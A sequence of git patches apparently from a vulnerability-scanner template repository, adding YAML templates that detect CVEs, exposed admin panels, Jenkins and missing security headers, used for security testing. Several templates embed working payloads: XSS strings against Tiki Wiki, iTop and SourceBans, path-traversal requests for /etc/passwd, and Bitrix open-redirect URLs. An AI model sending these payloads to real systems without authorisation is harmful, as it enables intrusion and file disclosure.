CMS Groupware 7.0 has XSS + author: pikpikcu + severity: medium + description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 + - https://www.securityfocus.com/bid/48806/info + - https://seclists.org/bugtraq/2011/Nov/140 + tags: cve,cve2016,xss,tiki-wiki + +requests: + - method: GET + path: + - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3Cscript%3Ealert%28document.cookie% 29;%3C/script%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html From 8c9697cb2f1d2e0edfff1dbfd8c1663cdc3b57c8 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 28 Jul 2021 07:19:43 +0700 Subject: [PATCH 1243/4083] Update CVE-2011-4336.yaml --- cves/2011/CVE-2011-4336.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml index 728e971575..0932d1bd99 100644 --- a/cves/2011/CVE-2011-4336.yaml +++ b/cves/2011/CVE-2011-4336.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php. - reference: + reference: | - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - https://www.securityfocus.com/bid/48806/info - https://seclists.org/bugtraq/2011/Nov/140 From 19a29bf7543cdf2951d2fae46be39e0276ab2b96 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 27 Jul 2021 20:32:43 -0400 Subject: [PATCH 1244/4083] Create getsimple-cms-detector.yaml Test ``` nuclei -t getsimple-cms-detector.yaml -u http://www.lrc.ic.unicamp.br/~luisrussi nuclei -t getsimple-cms-detector.yaml -u https://hebergement-pro.com/ ``` --- technologies/getsimple-cms-detector.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 technologies/getsimple-cms-detector.yaml diff --git a/technologies/getsimple-cms-detector.yaml b/technologies/getsimple-cms-detector.yaml new file mode 100644 index 0000000000..e2fda51c52 --- /dev/null +++ b/technologies/getsimple-cms-detector.yaml @@ -0,0 +1,20 @@ +info: + name: GetSimple CMS Detector + author: philippedelteil + severity: info + description: With this template we can detect a running GetSimple CMS instance + tags: getsimple +requests: + - method: GET + path: + - "{{BaseURL}}/readme.txt" + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'GetSimple CMS is a flatfile CMS' + - type: status + part: header + status: + - 200 From 38e095c98c9ac8371e2ec890987841223e97a577 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 28 Jul 2021 07:38:20 +0700 Subject: [PATCH 1245/4083] Fix Tags --- cves/2011/CVE-2011-4336.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml index 0932d1bd99..a6e4e66f47 100644 --- a/cves/2011/CVE-2011-4336.yaml +++ b/cves/2011/CVE-2011-4336.yaml @@ -9,7 +9,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - https://www.securityfocus.com/bid/48806/info - https://seclists.org/bugtraq/2011/Nov/140 - tags: cve,cve2016,xss,tiki-wiki + tags: cve,cve2011,xss,tiki-wiki requests: - method: GET From 0af99625ba05d67a2942e857aca4c3a50405f00a Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 28 Jul 2021 08:01:44 +0700 Subject: [PATCH 1246/4083] Create CVE-2015-6544.yaml --- cves/2015/CVE-2015-6544.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2015/CVE-2015-6544.yaml diff --git a/cves/2015/CVE-2015-6544.yaml b/cves/2015/CVE-2015-6544.yaml new file mode 100644 index 0000000000..fe35016498 --- /dev/null +++ b/cves/2015/CVE-2015-6544.yaml @@ -0,0 +1,31 @@ +id: CVE-2015-6544 + +info: + name: iTop XSS + author: pikpikcu + severity: medium + description: | + Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. + reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544 + tags: cve,cve2018,xss,grav + +requests: + - method: GET + path: + - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%3Cimg%20src%3D%22x%22%20onerror%3Djavascript%3Aalert%28document.domain%29%3B%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html From b65ac6853e1e21152685d0c0d84eb737d757febe Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 28 Jul 2021 08:02:57 +0700 Subject: [PATCH 1247/4083] Update CVE-2015-6544.yaml --- cves/2015/CVE-2015-6544.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-6544.yaml b/cves/2015/CVE-2015-6544.yaml index fe35016498..efd66299ca 100644 --- a/cves/2015/CVE-2015-6544.yaml +++ b/cves/2015/CVE-2015-6544.yaml @@ -7,7 +7,7 @@ info: description: | Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544 - tags: cve,cve2018,xss,grav + tags: cve,cve2015,xss,itop requests: - method: GET From 72fcdc20bf491424b0f59266d7ef7853519a9175 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 28 Jul 2021 08:37:25 +0700 Subject: [PATCH 1248/4083] Create bitrix-open-redirect.yaml --- .../other/bitrix-open-redirect.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 vulnerabilities/other/bitrix-open-redirect.yaml diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml new file mode 100644 index 0000000000..3e12be30af --- /dev/null +++ b/vulnerabilities/other/bitrix-open-redirect.yaml @@ -0,0 +1,31 @@ +id: bitrix-open-redirect + +info: + name: Bitrix Open URL redirect detection + author: pikpikcu + severity: low + tags: redirect,bitrix + +requests: + - method: GET + + path: + - '{{BaseURL}}/bitrix/rk.php?goto=https://example.com' + - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com' + - '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://example.com' + - '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com' + - '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com' + - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com' + - '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com' + - '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com' + - '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com' + - '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com' + - '{{BaseURL}}bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' + - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' + + matchers-condition: and + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From 783550d00383cb05a927f11199b3515962c10539 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 28 Jul 2021 08:38:48 +0700 Subject: [PATCH 1249/4083] Update bitrix-open-redirect.yaml --- vulnerabilities/other/bitrix-open-redirect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml index 3e12be30af..e88df0c69b 100644 --- a/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/vulnerabilities/other/bitrix-open-redirect.yaml @@ -4,6 +4,7 @@ info: name: Bitrix Open URL redirect detection author: pikpikcu severity: low + reference: https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html tags: redirect,bitrix requests: From 3a3ccf0ba21041f1c02df0d5ca83745d5d493895 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 28 Jul 2021 09:04:19 +0700 Subject: [PATCH 1250/4083] Create CVE-2019-14312.yaml --- cves/2019/CVE-2019-14312.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2019/CVE-2019-14312.yaml diff --git a/cves/2019/CVE-2019-14312.yaml b/cves/2019/CVE-2019-14312.yaml new file mode 100644 index 0000000000..4f414d6385 --- /dev/null +++ b/cves/2019/CVE-2019-14312.yaml @@ -0,0 +1,27 @@ +id: CVE-2019-14312 + +info: + name: Aptana Jaxer 1.0.3.4547 - Local File inclusion + author: daffainfo + severity: high + description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI. + reference: | + - https://www.exploit-db.com/exploits/47214 + - https://www.cvedetails.com/cve/CVE-2019-14312 + tags: cve,cve2019,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 4b7080333acb6b55592bc9743f06e2d610b2d6d8 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Wed, 28 Jul 2021 01:17:18 -0400 Subject: [PATCH 1251/4083] Rename unauthenticated-jenkin-dashboard.yaml to unaunthenticated-jenkin.yaml id - name file consistency --- ...ticated-jenkin-dashboard.yaml => unaunthenticated-jenkin.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/jenkins/{unauthenticated-jenkin-dashboard.yaml => unaunthenticated-jenkin.yaml} (100%) diff --git a/vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml b/vulnerabilities/jenkins/unaunthenticated-jenkin.yaml similarity index 100% rename from vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml rename to vulnerabilities/jenkins/unaunthenticated-jenkin.yaml From fac0ce7c4a78013507cb89975409691609531c5f Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 28 Jul 2021 12:20:31 +0700 Subject: [PATCH 1252/4083] Create openx-detect.yaml --- technologies/openx-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/openx-detect.yaml diff --git a/technologies/openx-detect.yaml b/technologies/openx-detect.yaml new file mode 100644 index 0000000000..052a1fec36 --- /dev/null +++ b/technologies/openx-detect.yaml @@ -0,0 +1,25 @@ +id: openx-detect + +info: + name: OpenX detect + author: pikpikcu + severity: info + tags: tech,openx + +requests: + - method: GET + path: + - "{{BaseURL}}/www/admin/" + + matchers: + - type: regex + part: body + regex: + - 'OpenX' + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'content="(.*)- http://www.openx.org">' From e3af07706db682225eed74e23dd969b43cd23a25 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 28 Jul 2021 12:45:44 +0700 Subject: [PATCH 1253/4083] Create CVE-2015-8349.yaml --- cves/2015/CVE-2015-8349.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2015/CVE-2015-8349.yaml diff --git a/cves/2015/CVE-2015-8349.yaml b/cves/2015/CVE-2015-8349.yaml new file mode 100644 index 0000000000..eefc6d6812 --- /dev/null +++ b/cves/2015/CVE-2015-8349.yaml @@ -0,0 +1,30 @@ +id: CVE-2015-8349 + +info: + name: SourceBans XSS + author: pikpikcu + severity: medium + description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php. + reference: https://nvd.nist.gov/vuln/detail/CVE-2015-8349 + tags: cve,cve2015,xss,sourcebans + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3Cimg%2Bsrc%3Dx%2Bonerror%3Dalert%28document.domain%29%3E&advType=btype" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/ From c81cec9a36479701ab4133f9ba4900a2746da6b9 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Wed, 28 Jul 2021 01:50:27 -0400 Subject: [PATCH 1254/4083] Create jenkins-detect.yaml test https://gce-jenkins.khanacademy.org https://jenkins.cdl.af.mil --- technologies/jenkins-detect.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 technologies/jenkins-detect.yaml diff --git a/technologies/jenkins-detect.yaml b/technologies/jenkins-detect.yaml new file mode 100644 index 0000000000..4892c53dc5 --- /dev/null +++ b/technologies/jenkins-detect.yaml @@ -0,0 +1,23 @@ +id: jenkins-detect + +info: + name: Jenkins detect (version) + author: philippdelteil + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - "X-Jenkins" + part: header + + extractors: + - type: kval + part: header + kval: + - X-Jenkins From 56a7c8095efa49e080d6b294ad3f37e725f4097c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 28 Jul 2021 13:00:02 +0700 Subject: [PATCH 1255/4083] Create CVE-2015-3648.yaml --- cves/2015/CVE-2015-3648.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2015/CVE-2015-3648.yaml diff --git a/cves/2015/CVE-2015-3648.yaml b/cves/2015/CVE-2015-3648.yaml new file mode 100644 index 0000000000..3bf390da84 --- /dev/null +++ b/cves/2015/CVE-2015-3648.yaml @@ -0,0 +1,23 @@ +id: CVE-2015-3648 + +info: + name: ResourceSpace - Local File inclusion + author: pikpikcu + severity: high + description: ResourceSpace is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. + reference: | + - https://vulners.com/cve/CVE-2015-3648/ + - https://www.securityfocus.com/bid/75019 + tags: cve,cve2015,lfi,resourcespace + +requests: + - method: GET + path: + - "{{BaseURL}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" From 2b719b9fdb1183a2de9f08baf6836bc9de592786 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 28 Jul 2021 15:28:21 +0530 Subject: [PATCH 1256/4083] Update CVE-2015-3648.yaml --- cves/2015/CVE-2015-3648.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-3648.yaml b/cves/2015/CVE-2015-3648.yaml index 3bf390da84..d2fd7042cb 100644 --- a/cves/2015/CVE-2015-3648.yaml +++ b/cves/2015/CVE-2015-3648.yaml @@ -20,4 +20,8 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" + + - type: status + status: + - 200 From bbc34b011babd92f682fb1203196ab1eaba16bfb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 28 Jul 2021 17:46:31 +0530 Subject: [PATCH 1257/4083] Create android-debug-database-exposed.yaml --- .../android-debug-database-exposed.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 misconfiguration/android-debug-database-exposed.yaml diff --git a/misconfiguration/android-debug-database-exposed.yaml b/misconfiguration/android-debug-database-exposed.yaml new file mode 100644 index 0000000000..669be2723a --- /dev/null +++ b/misconfiguration/android-debug-database-exposed.yaml @@ -0,0 +1,23 @@ +id: android-debug-database-exposed + +info: + name: Android Debug Manager + author: dhiyaneshDK + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22Android+Debug+Database%22 + tags: unauth,android + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Android Debug Database' + + - type: status + status: + - 200 From 71a27da89178b90d7ad593bb04e850f691dfb04d Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 28 Jul 2021 14:40:20 +0200 Subject: [PATCH 1258/4083] Added security headers templates --- .../http-present-security-headers.yaml | 116 ++++++++++++++++++ .../http-missing-security-headers.yaml | 113 +++++++++++++++++ 2 files changed, 229 insertions(+) create mode 100644 miscellaneous/http-present-security-headers.yaml create mode 100644 misconfiguration/http-missing-security-headers.yaml diff --git a/miscellaneous/http-present-security-headers.yaml b/miscellaneous/http-present-security-headers.yaml new file mode 100644 index 0000000000..66b98f6ea2 --- /dev/null +++ b/miscellaneous/http-present-security-headers.yaml @@ -0,0 +1,116 @@ +id: http-present-security-headers + +info: + name: HTTP Present Security Headers + author: socketz + severity: info + description: It searches present security headers, but obviously, could be so less generic and could be useless for Bug Bounty. + tags: config,headers + +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 3 + extractors: + - type: regex + part: header + group: 0 + regex: + - "(?im)(Strict-Transport-Security):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-Frame-Options):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-Content-Type-Options):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Content-Security-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-Permitted-Cross-Domain-Policies):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Referrer-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Clear-Site-Data):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Cross-Origin-Embedder-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Cross-Origin-Opener-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Cross-Origin-Resource-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-XSS-Protection):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Public-Key-Pins):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Except-CT):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Feature-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Permissions-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Document-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-XSRF-TOKEN):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-CSRF-TOKEN):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-CSRFToken):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Authorization):(.*)" diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml new file mode 100644 index 0000000000..64db558b09 --- /dev/null +++ b/misconfiguration/http-missing-security-headers.yaml @@ -0,0 +1,113 @@ +id: http-missing-security-headers + +info: + name: HTTP Missing Security Headers + author: socketz + severity: info + description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. + tags: config,headers,misconfiguration + +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 3 + matchers-condition: or + matchers: + - type: word + name: "Strict-Transport-Security" + words: + - "Strict-Transport-Security" + part: header + negative: true + - type: word + name: "Content-Security-Policy" + words: + - "Content-Security-Policy" + part: header + negative: true + - type: word + name: "X-Frame-Options" + words: + - "X-Frame-Options" + part: header + negative: true + - type: word + name: "X-Content-Type-Options" + words: + - "X-Content-Type-Options" + part: header + negative: true + - type: word + name: "X-Permitted-Cross-Domain-Policies" + words: + - "X-Permitted-Cross-Domain-Policies" + part: header + negative: true + - type: word + name: "Referrer-Policy" + words: + - "Referrer-Policy" + part: header + negative: true + - type: word + name: "Clear-Site-Data" + words: + - "Clear-Site-Data" + part: header + negative: true + - type: word + name: "Cross-Origin-Embedder-Policy" + words: + - "Cross-Origin-Embedder-Policy" + part: header + negative: true + - type: word + name: "Cross-Origin-Opener-Policy" + words: + - "Cross-Origin-Opener-Policy" + part: header + negative: true + - type: word + name: "Cross-Origin-Resource-Policy" + words: + - "Cross-Origin-Resource-Policy" + part: header + negative: true + - type: word + name: "Access-Control-Allow-Origin" + words: + - "Access-Control-Allow-Origin" + part: header + negative: true + - type: word + name: "Access-Control-Allow-Credentials" + words: + - "Access-Control-Allow-Credentials" + part: header + negative: true + - type: word + name: "Access-Control-Expose-Headers" + words: + - "Access-Control-Expose-Headers" + part: header + negative: true + - type: word + name: "Access-Control-Max-Age" + words: + - "Access-Control-Max-Age" + part: header + negative: true + - type: word + name: "Access-Control-Allow-Methods" + words: + - "Access-Control-Allow-Methods" + part: header + negative: true + - type: word + name: "Access-Control-Allow-Headers" + words: + - "Access-Control-Allow-Headers" + part: header + negative: true From 94eb880b5d13feb930e997dd1f8778726dfe9619 Mon Sep 17 00:00:00 2001 From: Toufik Airane Date: Wed, 28 Jul 2021 14:59:31 +0200 Subject: [PATCH 1259/4083] Update CONTRIBUTING.md Add two tips in the 'Tip from us' section --- CONTRIBUTING.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 37911ee048..64b958e817 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -94,4 +94,6 @@ You can refer to the following articles of Git and GitHub basics. In case you ar ## Tip from us😇 -**Nuclei** outcomes are only as excellent as **template matchers💡** \ No newline at end of file +- **Nuclei** outcomes are only as excellent as **template matchers💡** +- Declare at least two matchers to reduce false positive +- Avoid matching words reflected in the URL From 0b322547923daae439bdba3e1bbeb7b42cad79df Mon Sep 17 00:00:00 2001 From: Toufik Airane Date: Wed, 28 Jul 2021 15:02:10 +0200 Subject: [PATCH 1260/4083] Update CONTRIBUTING.md --- CONTRIBUTING.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 64b958e817..2a3e83abcb 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -96,4 +96,4 @@ You can refer to the following articles of Git and GitHub basics. In case you ar - **Nuclei** outcomes are only as excellent as **template matchers💡** - Declare at least two matchers to reduce false positive -- Avoid matching words reflected in the URL +- Avoid matching words reflected in the URL to reduce false positive From efde0774e599ad7152032deaaf46cb0b0b81ce1b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 28 Jul 2021 20:29:55 +0530 Subject: [PATCH 1261/4083] Update jenkins-detect.yaml --- technologies/jenkins-detect.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/technologies/jenkins-detect.yaml b/technologies/jenkins-detect.yaml index 4892c53dc5..4153223310 100644 --- a/technologies/jenkins-detect.yaml +++ b/technologies/jenkins-detect.yaml @@ -4,6 +4,7 @@ info: name: Jenkins detect (version) author: philippdelteil severity: info + tags: tech,jenkins requests: - method: GET @@ -16,8 +17,13 @@ requests: - "X-Jenkins" part: header + - type: word + words: + - "Sign in [Jenkins]" + part: body + extractors: - type: kval part: header kval: - - X-Jenkins + - x_jenkins From 9f93ea0ebaa215bd57410d5e137e6e2dce93e2f4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 28 Jul 2021 21:37:19 +0530 Subject: [PATCH 1262/4083] Update android-debug-database-exposed.yaml --- misconfiguration/android-debug-database-exposed.yaml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/misconfiguration/android-debug-database-exposed.yaml b/misconfiguration/android-debug-database-exposed.yaml index 669be2723a..3aaa785044 100644 --- a/misconfiguration/android-debug-database-exposed.yaml +++ b/misconfiguration/android-debug-database-exposed.yaml @@ -17,7 +17,3 @@ requests: - type: word words: - 'Android Debug Database' - - - type: status - status: - - 200 From bc8778857303c8ee6b34a2cca55afdd75c1721e6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 28 Jul 2021 21:42:42 +0530 Subject: [PATCH 1263/4083] Create clearpass-policy-manager.yaml --- exposed-panels/clearpass-policy-manager.yaml | 23 ++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/clearpass-policy-manager.yaml diff --git a/exposed-panels/clearpass-policy-manager.yaml b/exposed-panels/clearpass-policy-manager.yaml new file mode 100644 index 0000000000..57a79fe6af --- /dev/null +++ b/exposed-panels/clearpass-policy-manager.yaml @@ -0,0 +1,23 @@ +id: clearpass-policy-manager + +info: + name: ClearPass Policy Manager - Aruba Networks + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22 + tags: panel,aruba + +requests: + - method: GET + path: + - '{{BaseURL}}/tips/tipsLogin.action' + + matchers-condition: and + matchers: + - type: word + words: + - 'ClearPass Policy Manager - Aruba Networks' + + - type: status + status: + - 200 From 98421a487a573116734b5844d8f72cc8f935a557 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 28 Jul 2021 21:46:09 +0530 Subject: [PATCH 1264/4083] Create sgp-login-panel.yaml --- exposed-panels/sgp-login-panel.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/sgp-login-panel.yaml diff --git a/exposed-panels/sgp-login-panel.yaml b/exposed-panels/sgp-login-panel.yaml new file mode 100644 index 0000000000..4a1c6e48da --- /dev/null +++ b/exposed-panels/sgp-login-panel.yaml @@ -0,0 +1,23 @@ +id: sgp-login-panel + +info: + name: SGP Panel + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22SGP%22 + tags: panel,sgp + +requests: + - method: GET + path: + - '{{BaseURL}}/accounts/login?next=/admin/' + + matchers-condition: and + matchers: + - type: word + words: + - 'SGP' + + - type: status + status: + - 200 From 4a87035c5342c86d1e3ddfb3179e0ccecd17e9a9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 28 Jul 2021 22:01:33 +0530 Subject: [PATCH 1265/4083] Create cisco-sendgrid.yaml --- exposed-panels/cisco-sendgrid.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/cisco-sendgrid.yaml diff --git a/exposed-panels/cisco-sendgrid.yaml b/exposed-panels/cisco-sendgrid.yaml new file mode 100644 index 0000000000..407195e55f --- /dev/null +++ b/exposed-panels/cisco-sendgrid.yaml @@ -0,0 +1,23 @@ +id: cisco-sendgrid + +info: + name: Cisco ServiceGrid + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22 + tags: panel,cisco + +requests: + - method: GET + path: + - '{{BaseURL}}/pages/sdcall/Login.jsp' + + matchers-condition: and + matchers: + - type: word + words: + - 'Cisco ServiceGrid' + + - type: status + status: + - 200 From e3f100fc09c1860a9e4fe6a952b6a6094c3913d3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 28 Jul 2021 22:20:33 +0530 Subject: [PATCH 1266/4083] Create identity-services-engine.yaml --- exposed-panels/identity-services-engine.yaml | 24 ++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/identity-services-engine.yaml diff --git a/exposed-panels/identity-services-engine.yaml b/exposed-panels/identity-services-engine.yaml new file mode 100644 index 0000000000..cef392b5d4 --- /dev/null +++ b/exposed-panels/identity-services-engine.yaml @@ -0,0 +1,24 @@ 